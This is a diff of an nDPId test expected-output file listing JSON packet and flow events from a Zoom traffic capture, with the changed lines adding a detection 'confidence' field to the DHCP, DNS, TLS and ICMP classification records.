 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569520469264,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469264,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIADMAAEAR70fAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569520469274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1569520469274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIzF0AAEARIx3AqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469340,"flow_last_seen":1569520469340,"flow_idle_time":7440000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":1,"ts_msec":1569520469340,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -72,141 +72,141 @@
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569520469370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520469370,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGzrXAqAF1aMdBKtJrAFCnuOsgVolceIAQD\/4OlAAAAQEICiWc2z+z1h7T"}
 00540{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569520469423,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569520469423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4WycAAEABlHPAqAF1ov8mDgMDkd4AAAAARQAAPMGVQAAuEf\/wov8mDsCoAXUNl11fACgAAA=="}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"proto":"ICMP.Zoom","breed":"Acceptable","category":"Network"},"entropy":4.182005}
+00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569520469433,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569520469433,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4ZPoAAEABiqDAqAF1ov8mDgMDkd4AAAAARQAAPMGZQAAuEf\/sov8mDsCoAXUNl11fACgAAA=="}
 00362{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1569520469782,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569520469797,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"ts_msec":1569520469797,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzBkxAAEARcsXAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABIog9sAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
+00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469950,"flow_last_seen":1569520469950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520469950,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569520469950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520469950,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBQ3AqAF1NMo+xNZRAbvXiDKIAAAAALAC\/\/8cGAAAAgQFtAEDAwUBAQgKJZzdfwAAAAAEAgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569520469984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1569520469984,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6vIgAAP8Re2PAqAF1wKgBAfYMADUAJtTToX0BAAABAAAAAAAABHd3dzMEem9vbQJ1cwAAAQAB"}
-00731{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569520470021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1569520470021,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKWCQAADcRp7jAqAEBwKgBdQA19gwANiAtoX2BgAABAAEAAAAABHd3dzMEem9vbQJ1cwAAAQABwAwAAQABAAAAPAAENMo+7A=="}
-00745{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}}
+00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470022,"flow_last_seen":1569520470022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520470022,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569520470022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520470022,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOXAqAF1NMo+7NZSAbv67hZtAAAAALAC\/\/8UXQAAAgQFtAEDAwUBAQgKJZzdxgAAAAAEAgAA"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569520470060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520470060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO8GVhg0yj7EwKgBdQG71lFyHvWD14gyiYASaQOGlAAAAgQFrAEBBAIBAwMM"}
 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569520470061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569520470061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBSXAqAF1NMo+xNZRAbvXiDKJch71hFAQIAAQZwAA"}
-00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569520470134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520470134,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVvA0yj7swKgBdQG71lK89vcv+u4WboASaQMynAAAAgQFrAEBBAIBAwMM"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1569520470134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1569520470134,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBP3AqAF1NMo+7NZSAbv67hZuvPb3MFAQIAC8bgAA"}
-00808{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
-00859{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01184{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
-00864{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01189{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}}
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00885{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01210{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, 